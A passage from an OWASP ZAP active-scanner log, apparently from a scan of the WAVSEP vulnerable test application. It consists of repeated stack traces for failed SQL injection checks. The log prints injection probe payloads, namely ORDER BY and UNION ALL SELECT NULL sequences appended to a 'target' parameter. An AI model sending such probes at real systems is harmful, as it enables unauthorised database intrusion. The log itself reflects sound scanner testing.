org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688413 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 4954#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) ORDER BY 4954# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688414 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688416 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688417 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688418 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688428 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688429 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688431 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688432 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688440 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688440 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688441 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688442 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 9992#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 9992# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 